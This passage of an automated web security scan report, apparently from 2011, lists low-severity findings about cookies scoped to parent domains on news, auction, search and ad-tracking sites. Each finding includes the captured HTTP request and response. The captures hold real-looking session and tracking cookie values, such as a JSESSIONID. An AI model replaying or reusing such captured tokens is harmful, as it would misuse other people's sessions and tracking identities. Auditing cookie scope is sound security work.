Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII1LEDEAoYASABKAEwoIvs8AQQoIvs8AQYAA..; sess=1; uuid2=3420415245200633085; anj=Kfw)lByB_/)J710+(.p3Z5+h4$Vy!yQYtW=Z5Z#lksL^h_:u[IkzlP?'IePJ/Z#Fy#8/vNL^@iW')uNV=zGung>(`Nvl+CN8u-4+Q:+G!i8zGW$6P0Ygj@gDJ6!3?ZhDD5$=8BCeDZt%n`?LyXoJ#6)EuCK6aCI$H_MElJh'P$eeW!*0s)5De8DL?*#b$[EsY7U88->_iR@sU@-_C!RX0K>pRo:'hdT`N%S]+?#:oYotSYv4@Yo^B@ypqVmgsn2IQvk]ngqdF)yegzmDu+k*[z^t:y@KNF?jNEu`nMBkjUs9T2ndLh!>yTe'`=U1hcD5i0M#o^+INb#$Fo#H]Y+!sTkU/=CCna0DqAscOQEb18*N=6E.D9a:91#6DRsnGmNy*nBg3QRvH6PO^D63]1Av>W9w7$qzEylR?X'('H+w*hOjM1CKvMOdL.x6nkE)2MTY5>uVbIIRX*WFGCg]V>7+6OIy0p@me-wEAV*5(6<x%kah-9v8G31F+D1hgwE.>bj3k$+_hrDkc0#`8fWEmU*b5Al<nY!0k14WeBG[Rc%(D3io)qo*(Vm%(Wt$).pcz]RVf*JJ.pv>fpY3BKSs8.f/qLc%eUa?ZD^I1VIp[X@kcfSC75Y_=l$)qPK]!zpr2SCQ-q]``OVL*/=(GCO7b!0sGu0sx<Y+$^WE/FM2.1ZPl%av@7<^=/5jy:KaE%l(nW>n3iDaFbwW!JTqWV-st*l7vo:UeNqhsP.`j$]GjFrRJtqDW3cBrZ9sY+WHuay<OsLep3

Response

HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 20-Jul-2011 18:36:05 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Mon, 17-Oct-2011 18:36:05 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)lByB_/)J710+(4l>TXOa/.Birq1fq-X1ERjb@jz/SQr@WW]eUJ-OE*1#UHg*y%yOLtrDh-C4!Hli5a!`H2^lxIri!1F8u-S'01a-)<.7^F*rx5H4abfMh8ka_c$rXGuAnkCQhvg(eH>ow9.x?t0KJTEJbtcX^90n-JKj)^q-:`?.Q^cx-#SPiA)Xvm<4-KK3*yAdiR?e3@*x6kRX0IipL$d9hb'5B).jNM(-0gRpoyYWA:OpD@yyRKmgsn2IT*8)ndMM#)ulobbjOQ[2x/si'Oj2dh]?Rfs-b1cH+3z?T2j4wh!H'UucnRj1hcD_i0_vk7v`xHvikYsgmE/Fnn.rp+SOt#=IA`bM]+`?1TG^@6E.<eb8<327x<r9r$nc`9jV1oH!Ecm%'+9AA0fIOIil@mkb0ClZAW(Sb9Ap%Wd-/j6y[!k)AQq_):^`Ru22I]KSNT1C+yO(Zhq67RVPrPp108OQNoMbkQ5%%IO)H^Xo:ZWT=9DHt8?JX[MBc.='TK#t[zgSwT%0AAS9ksGdUbRBu[L2fVttAEImIc0kL6(5GCL.-^IVfqMi*(#U2Rj`.VK0DFzHnR-ao7Enah'MdsB.Cj!e$1sY_6/o7O(PN:cvbi9uYTTpwSQ#ecxe?Yn2rWdm*='f$1ZusKKmC4f5>^)ma(vor3?sbu[5VvqNbgC)$m$F1+x%%1$u-rqb]$/hZbv'fVWGPkWCSQ$U`:/q'F[-kQuU:ZcqgBD2XC8T8p=`2x9ftcpHl/@6Zg5Xbt-q^wwx1e`%M<aT; path=/; expires=Mon, 17-Oct-2011 18:36:05 GMT; domain=.adnxs.com; HttpOnly
Location: http://matcher.bidder7.mookie1.com/zap?aid=10000212&sid=223
Date: Tue, 19 Jul 2011 18:36:05 GMT
Content-Length: 0


13.108. http://sitelife.boston.com/ver1.0/Direct/Jsonp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.boston.com
Path:   /ver1.0/Direct/Jsonp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Direct/Jsonp?r=%7B%22Requests%22%3A%5B%7B%22ArticleKey%22%3A%7B%22Key%22%3A%22b12c8144-b20e-11e0-aa83-a59fd6e1b552%22%7D%7D%5D%2C%22UniqueId%22%3A0%7D&cb=RequestBatch.callbacks.daapiCallback0 HTTP/1.1
Host: sitelife.boston.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: OAX=rcHW803KasIABjIw; s_vi=[CS]v1|26E5356B85012F68-4000011580017645[CE]; __unam=b6206f2-12fdeb21084-67db55f0-1; anonId=2115b2a8-118a-4f17-925c-f4ae050c3414; bcpage=8; __qca=P0-192291824-1311108181675; s_cc=true; s_pv=Boston.com%20home%20page; s_sq=nytbglobe%3D%2526pid%253DBoston.com%252520home%252520page%2526pidt%253D1%2526oid%253Dhttp%25253A//www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7%2526ot%253DA; s_ppv=16

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 838
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: l3vm104l3pluckcom
Set-Cookie: SiteLifeHost=l3vm104l3pluckcom; domain=boston.com; path=/
Date: Tue, 19 Jul 2011 20:43:58 GMT

RequestBatch.callbacks.daapiCallback0({"ResponseBatch":{"Messages":[{"Message":"ok","MessageTime":"07/19/2011 04:42:04:603 PM"}],"Responses":[{"Article":{"ArticleKey":{"Key":"b12c8144-b20e-11e0-aa83-a
...[SNIP]...

13.109. http://sitelife.boston.com/ver1.0/Stats/Tracker.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.boston.com
Path:   /ver1.0/Stats/Tracker.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Stats/Tracker.gif?plckUrl=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html%3Fp1%3DNews_links&plckUserId=null&plckGcid=daapiCall&plckCurrentTime=1311108242646 HTTP/1.1
Host: sitelife.boston.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: OAX=rcHW803KasIABjIw; s_vi=[CS]v1|26E5356B85012F68-4000011580017645[CE]; __unam=b6206f2-12fdeb21084-67db55f0-2; anonId=2115b2a8-118a-4f17-925c-f4ae050c3414; bcpage=8; __qca=P0-192291824-1311108181675; s_cc=true; s_pv=Business%20%7C%20Blog%20%7C%20Business%20Ticker%20Weblog%20%7C%20State%20Street%20announces%20more%20job%20cuts%20; s_sq=%5B%5BB%5D%5D; s_ppv=0; SiteLifeHost=l3vm104l3pluckcom

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 0
Content-Encoding: deflate
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: l3vm104l3pluckcom
Set-Cookie: SiteLifeHost=l3vm104l3pluckcom; domain=boston.com; path=/
Date: Tue, 19 Jul 2011 20:44:37 GMT


13.110. http://srx.main.ebayrtm.com/rtm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://srx.main.ebayrtm.com
Path:   /rtm

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /rtm?RtmCmd&a=json&p=699:1595:973:974:825:827:829:813:283:280:433:876:912:1650:1651&ph=0:0:0:0:0:0:0:0:0:0:0:0:0:0:0&ev=0:0:0:0:0:0:0:0:0:1:0:0:0:0:0&g=adb7b0cb1300a0aa15432be3fe5c7984&uf=0&c=1H4sIAAAAAAAAAFVU32vbMBB%2BL%2FR%2FMGxPQ011OkmWAnoobQctNA1N1m0QMG6itqaNHWxnWSB%2F%2FE6Sl25Pd9%2F9%2BHT%2BTvKn%2BdZnt9v3DGwGMEY1Fia7m80zwQFOTzbC5o4Hy8FFzLn7JjLUPJs32zYT2bxavvm%2Byzq%2FRKmyid9lt77t%2FD777leBev%2FBpRxYNFyaSIngnqr6ZfRc1l1dbkbLZk1hQONAgxDRzx0gV8G11oHgubRWciF5zGKcCVA4xUcplMYELeLYYOWRQA8pC27my66p%2F47O2Mwv%2B6qpGX0Am2zXT77NmudjWrC7pu5fWfgWdv3L13022z71%2B41nD83y7XzabM4v3nvf1qMhPQ%2B5y6Ze%2Bpb6H31NIs%2F6svfn07b5VVGcfeg05C%2BrntjLrs8etv2rb5%2BbdsV%2B%2BrJlQT52Ve7JoQN3jFBqmZTrRHTny1Wzey%2FrVRfOWVXboCSa3LXrt%2FvyovtyerKsViTgYss50fFk1f8wqCNsUknlztqRtTEmj50xhUlbg05i3ASCoepUbMSwlGgQ8gTTPhB0gnBkR5Du682P66ti%2BnBzeR0jOBQTFQGRGzCaTg%2BXBpSjO8jTugVVfiZVIo6BXMVWyYerkRs3rDHNP%2Bzn31Aok9LF4an9ePckuGCRGycj5gOmmsVYkSqmOCPpxsAl58UZklcAF3oxFgWAJot5CMjFWHJyOLVZsjoPPYVQCqlHSgNQWC2USUAUEnMRedHayKuxEKgCozTK5DEWvJQlIg3k0XBmGBHd%2FcbXi6hBUhzp4U7LF%2F9Y%2Bd1N79cT%2F7sPgjkj0%2Fs2wzv%2F2Ds%2FaiG0daS1YsAkMGFRMuTCMG2ZHrCyTMXS%2BE6VgvxgDVdGHuj6WmPNAZUAjfYguVZc5JE2H34q6XYIlM7EuA74DxaR6JCcBAAA&ord=1311100529004&e=USC:1&z=10&bw=1065&bh=723&cg=3666b2e01300a47a44d622a6ffc19372&enc=UTF-8&v=4&rnc=1&cb=vjo.dsf.assembly.VjClientAssembler._callback0&_vrdm=1311100538345 HTTP/1.1
Host: srx.main.ebayrtm.com
Proxy-Connection: keep-alive
Referer: http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem&item=120749940240+&clk_rvr_id=248601715093&item=120749940240
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
RlogId: p4pphdlwc%3D9u%7E*t%28750d%7F2%3B-13143af2894-0x16f
Cache-Control: no-cache
Expires: 0
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: A01=ABQAsMSUOAAAAAAAA5QuZsFGR1aCzORA; Domain=main.ebayrtm.com; Expires=Wed, 18-Jul-2012 18:36:18 GMT; Path=/rtm
Set-Cookie: M01=AAAACOACQgAE; Domain=main.ebayrtm.com; Expires=Wed, 18-Jul-2012 18:36:18 GMT; Path=/rtm
Set-Cookie: TC01=QBIPKvOUMBAAAEALjElDAAAAAAAQGAAABPkbGAktwIAS1aCQmdiAI; Domain=main.ebayrtm.com; Expires=Wed, 18-Jul-2012 18:36:18 GMT; Path=/rtm
Set-Cookie: RUA=D1AQAAATErF7ITAAYZchzOJQkAi5g%2BSQv3HKquZ2UrSVcKqhXgTu2GgiVmuErKwnKU3EYCaSfQGfK4sdpUu7I77It5rkG%2FanWo9FEvGie%2FiCjYBRuz%2Bu%2BZVv%2BrRQ6jwbWnCXh61dKhTowAEb5BjV%2B5KPdxZawyqSMM9g7Pi697Ovt5X8I8Ko%2Ffi7lhEUATgXz%2F%2Bm47HrMTGxCPDyF%2F3CYZ; Domain=main.ebayrtm.com; Expires=Thu, 18-Jul-2013 18:36:18 GMT; Path=/rtm
Set-Cookie: RUP=D1AQAAATErF7ITAAZS1xanS0Gk9aSM%2BmfKsGDaavNO5bWn4V4sSMYKOyEr1u1UDyQ*; Domain=ebayrtm.com; Expires=Thu, 18-Jul-2013 18:36:18 GMT; Path=/rtm
Set-Cookie: HT=1311100529004%02433%04165364%06142708%03829%04-1%060%03827%04-1%060%03825%04174461%06154106%03699%04-1%060%031595%04184241%06144661%03912%04-1%060%03974%04-1%060%03973%04187759%06167625%03876%04-1%060%031651%04-1%060%03813%04-1%060%031650%04-1%060%03283%04153923%0699446%03280%04153917%0699446; Domain=main.ebayrtm.com; Path=/rtm
Content-Type: application/x-javascript;charset=UTF-8
Content-Length: 72197
Date: Tue, 19 Jul 2011 18:36:17 GMT

try{vjo.dsf.assembly.VjClientAssembler._callback0([
{"id":"1595","mid":"184241","iid":"1457744126094707453","type":"html","width":"-1","height":"-1","content":"<body>\n <div class=\"pi\">\n<div cl
...[SNIP]...

13.111. https://ssl.bing.com/travel/secure/account/overview  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ssl.bing.com
Path:   /travel/secure/account/overview

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /travel/secure/account/overview?FORM=TRGRMR HTTP/1.1
Host: ssl.bing.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lbc=318; JSESSIONID=E9781CDFFAE578D97F1CEE56FE6B125F; ETID=BCID-z62stftdmjtffpyz5v577d2o9v13o_VID-2a4fcb0ot2i3byz5nk9raqul1bf3_UID-; s_cc=true; s_sq=%5B%5BB%5D%5D; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110514; _UR=OMW=1; s_nr=1306591010561; SRCHUID=V=2&GUID=7F073A8D66F24C72BB90F3E48AA61B8A; _msaId=d8678782_61_15534038; _FP=; MUID=E361C23374E642C998D8ABA7166A75EC; SRCHD=MS=1865664&SM=1&D=1769857&AF=BMMENO; _SS=SID=2FF6BBE251234F40B4038D899CDFDA5D&hIm=796; RMS=F=OC; _HOP=

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private, no-store, max-age=0
Content-Length: 0
Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1311118711&rver=6.1.6195.0&wp=LBI&wreply=https:%2F%2Fssl.bing.com%2Fsecure%2Fpassport.aspx%3Frequrl%3Dhttp%253A%252F%252Fssl.bing.com%252Ftravel%252Fsecure%252Faccount%252Foverview%253FFORM%253DTRGRMR%2526wlidtobt&lc=1033&id=264960
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Tue, 19 Jul 2011 23:38:32 GMT
Connection: keep-alive
Set-Cookie: _HOP=I=2&TS=1311118711; domain=.bing.com; path=/


13.112. http://tags.bluekai.com/site/2731  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/2731

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/2731 HTTP/1.1
Host: tags.bluekai.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: bkp1=; bku=qxW99BY4DAtkc89a; bkw4=; bk=6XdZv65dzaRBvF/1; bkc=KJh56qXFOWWDOdeFfvTyNGdKM0QPG+oWmJUti7UPDPhz/NaoaD5Y/+K/QrjWJ8WnmDJhP9it2a2/61Qka6sDlMFKpqt+Jod12XNXJ2wGOToPQ2Vg65McXUYec/Ngayv67HMQzQiTUCInwjHSFAijXIvve8x0ysNATh94uIpZMwjg0F+Et7LoXd7LwMnlmfaK38XcQwltRoxwEfPFvL87FDY2egp7Htnpf2Z0B+X7Fi4qOYQ4tqS4JgD8nlTAC8E4tccmgtkpUkyq9YqmeHjV7eXeqzbnO6Bbfpzy7lwmH+3zat2t9EInycwVrHCGapgzocbflxjJ8mhdxEAUSFmXrWofZHbeCy8woXh8LSU8rTmddhDFqtFwqV7pvFTa6IvJwy==; bko=KJyp8Z5QSB6ibX4/zaZRQuWUpOvsLbf9VuWi1BRABQSsVxLTdUQRfF901BppTFHMRk9aLQTRzyJkWTsLwV9V9sVbWAQ=; bkst=KJhMR5Mwhz9QyreG3sL99RSVhGqZOCRZHrS+YpM2VOQm9rPPsWy1nY61AhmB5RtEpRNNEj/BMcD+eYhu5Pw1eYNEDoBBW+11DtrbxmGF9BVp18EZjK4kkI45Xy/J4x9vYEmRs8LSVHQjsorRsOLRVOQRskQRcM/su4Bp1yYO4yY/fzrBoBLqnBuYvqxDvYEBTmpGsrp3ct7QsrTEkHZuqOHDjHHujHaCSaRSKQOLXYGIOQRKCQecGO9dNbeT6aOwkdO6AniN9JvJeYtz4QeDTpy5; bkw5=KJhgDsHQRmeSh19aoWxjTMDRsOQjmn7tEZ5QIvzaA47c01e9hoeQCoY8oytDARnGWVYRRTixtSvn1WtxTjGHxrRDAGyxyNXAsUj2CsZYe/TZYOAwG1A1cJLREQ9ocQRZqTu13QDeQ8wZJQRNJQRsaGjXn8e1BmRwkQy1ZkYjmvYgmHkvQEJ1xetmeD9KP6Gp96mCa59ypA61UhCO1rctYJ6vxnRph6WsWsOAKsRwA7dnrlLS/8YzrRvHG5tOQuaBRCBeYkMIoxwWBDOMs90z/m8XO3uTsHRCr4mqOXEUa2QjsaQjsJaAOnhOiiW0n9p1ue/wFuabH1eCLx+J8GQdA9NlRUyQi/uTXOvvEY3uMWG9zFhKe6YRhCV/gmzoAofjvevBxxQj9vJBUOx=; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E1015bioI/c9WjcOjX=; bklc=4e25ec55; bkdc=res

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:43:29 GMT
Server: Apache/2.2.3 (CentOS)
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Wed, 20 Jul 2011 20:43:29 GMT
Cache-Control: max-age=86400, private
Set-Cookie: bk=DLpRi65dzaRBvF/1; expires=Sun, 15-Jan-2012 20:43:29 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh56ENn96WxOrOlf686wE2bwfODWvLe6PMjoMCEHR+QsLcvNi/vYoJsnnuJt9AueYoJWSNDNYF2a6v6Wus/i3DpAVWpP06wIXfmfs8iQ1R/zn1NWULGMuqAKL3aywkMWYCVeESrht14jhNcA23zaN5XGJxOfi/qCdCzjq47+P2EwogPwA0jptzwAn74r4DbdEy9fnKVDEboS52V7YdfQVREK1IwAP+Ef/V0BFzEw8O+9oHwqDhw9dqpMeq7hDdAAwnqIXf8EVlmi0IsQmAgQIPN8b29ZdwiTjerIy1L8j0pAEq7hEL2ymXvXJJNnQqSCublSqbeUG1AzFSdGjyn+qkKUvV2EJdOR847DrSXtan2d4cddTgU2gxU5fP8a4XOYOi1jQ==; expires=Sun, 15-Jan-2012 20:43:29 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101u8XGIGc9W5lOCL=; expires=Sun, 15-Jan-2012 20:43:29 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Wed, 20-Jul-2011 20:43:29 GMT; path=/; domain=.bluekai.com
BK-Server: 4a4
Content-Length: 62
Content-Type: image/gif

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;

13.113. http://tags.bluekai.com/site/450  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/450

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/450 HTTP/1.1
Host: tags.bluekai.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: bkp1=; bku=qxW99BY4DAtkc89a; bkw4=; bk=HisbCW5dzaRBvF/1; bkc=KJh56g2n9pWDOdOFKiKS7Mdt3MCtWvze6E385MQfPR5iabaEPyzPavunmmCuzHmAvaULDJNDNOF2nyHNWSs/i3wFVjfor0UJCl0EkTEWOZCkQvFNiRisivZ8unMAm2z2RY6cl/xtYFYhpmf1SgXAFeI+FjzyfXXKJnXw9uztCKgkKJuiKrpUjbBXKvo2U5zrBfgtzepvegwSUW2XkQqSqKY+mwjlwdjzEjFpTMr0MRcSA4llT8xt8XDw8/e0spFmhPP+pGrqyXeArzaih47ENISXKYuQ2dAsaQgmIPYqXInBwrO7YUMvm852fPvwmluIlUbemcEtF3OzYnH8FqCOzfAOQdLKp0E1Kqsk2qzcl4XQU+7V7+du8kfXYhy2Cl6=; bko=KJyp8Z5QSB6ibX4/zaZRQuWUpOvsLbf9VuWi1BRABQSsVxLTdUQRfF901BppTFHMRk9aLQTRzyJkWTsLwV9V9sVbWAQ=; bkst=KJhMR5Mwhz9QyreG3sL99RSVhGqZOCRZHrS+YpM2VOQm9rPPsWy1nY61AhmB5RtEpRNNEj/BMcD+eYhu5Pw1eYNEDoBBW+11DtrbxmGF9BVp18EZjK4kkI45Xy/J4x9vYEmRs8LSVHQjsorRsOLRVOQRskQRcM/su4Bp1yYO4yY/fzrBoBLqnBuYvqxDvYEBTmpGsrp3ct7QsrTEkHZuqOHDjHHujHaCSaRSKQOLXYGIOQRKCQecGO9dNbeT6aOwkdO6AniN9JvJeYtz4QeDTpy5; bkw5=KJhgDsHQRmeSh19aoWxjTMDRsOQjmn7tEZ5QIvzaA47c01e9hoeQCoY8oytDARnGWVYRRTixtSvn1WtxTjGHxrRDAGyxyNXAsUj2CsZYe/TZYOAwG1A1cJLREQ9ocQRZqTu13QDeQ8wZJQRNJQRsaGjXn8e1BmRwkQy1ZkYjmvYgmHkvQEJ1xetmeD9KP6Gp96mCa59ypA61UhCO1rctYJ6vxnRph6WsWsOAKsRwA7dnrlLS/8YzrRvHG5tOQuaBRCBeYkMIoxwWBDOMs90z/m8XO3uTsHRCr4mqOXEUa2QjsaQjsJaAOnhOiiW0n9p1ue/wFuabH1eCLx+J8GQdA9NlRUyQi/uTXOvvEY3uMWG9zFhKe6YRhCV/gmzoAofjvevBxxQj9vJBUOx=; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E1015bioI/c9WjcOjX=; bklc=4e242eb4

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:43:01 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: bklc=4e25ec55; expires=Thu, 21-Jul-2011 20:43:01 GMT; path=/; domain=.bluekai.com
Set-Cookie: bk=6XdZv65dzaRBvF/1; expires=Sun, 15-Jan-2012 20:43:01 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh56qXFOWWDOdeFfvTyNGdKM0QPG+oWmJUti7UPDPhz/NaoaD5Y/+K/QrjWJ8WnmDJhP9it2a2/61Qka6sDlMFKpqt+Jod12XNXJ2wGOToPQ2Vg65McXUYec/Ngayv67HMQzQiTUCInwjHSFAijXIvve8x0ysNATh94uIpZMwjg0F+Et7LoXd7LwMnlmfaK38XcQwltRoxwEfPFvL87FDY2egp7Htnpf2Z0B+X7Fi4qOYQ4tqS4JgD8nlTAC8E4tccmgtkpUkyq9YqmeHjV7eXeqzbnO6Bbfpzy7lwmH+3zat2t9EInycwVrHCGapgzocbflxjJ8mhdxEAUSFmXrWofZHbeCy8woXh8LSU8rTmddhDFqtFwqV7pvFTa6IvJwy==; expires=Sun, 15-Jan-2012 20:43:01 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Wed, 20-Jul-2011 20:43:01 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Wed, 20 Jul 2011 20:43:01 GMT
Cache-Control: max-age=86400, private
BK-Server: a96f
Content-Length: 62
Content-Type: image/gif

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;

13.114. http://tap.rubiconproject.com/oz/feeds/targus/profile  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tap.rubiconproject.com
Path:   /oz/feeds/targus/profile

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /oz/feeds/targus/profile?p=targus&oz_source=partner&segment=000&zip=&dob=&gender=&pc= HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://support.gamehouse.com/app/answers/detail/a_id/861/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; lm="20 Jun 2011 13:04:50 GMT"; ruid=154dd07bb6adc1d6f31bfa10^10^1308614585^2915161843; put_1902=NsCNKTbG1n8vl4t9NZDDK2fBjy8vnIx8N5b7JrdL; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_1986=3420415245200633085; put_1185=4325897289836481830; put_2132=E3F32BD05A8DDF4D5646D79640088B; put_2211=2814750682866683; rpb=5575%3D1%265852%3D1%264222%3D1%262114%3D1%264894%3D1%266432%3D1%264212%3D1%264120%3D1%266286%3D1%266811%3D1%26733%3D1%267259%3D1%264706%3D1; cd=false; dq=98|8|90|0; khaos=GOVBRMNC-I-DXQD

Response

HTTP/1.1 204 No Content
Date: Tue, 19 Jul 2011 20:27:49 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Wed, 18-Jul-2012 20:27:49 GMT; Path=/
Set-Cookie: dq=100|10|90|0; Expires=Wed, 18-Jul-2012 20:27:49 GMT; Path=/
Set-Cookie: xdp_ti="19 Jul 2011 20:27:49 GMT"; Version=1; Max-Age=604800; Path=/
Set-Cookie: lm="19 Jul 2011 20:27:49 GMT"; Version=1; Domain=.rubiconproject.com; Max-Age=31536000; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


13.115. http://tap.rubiconproject.com/oz/sensor  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

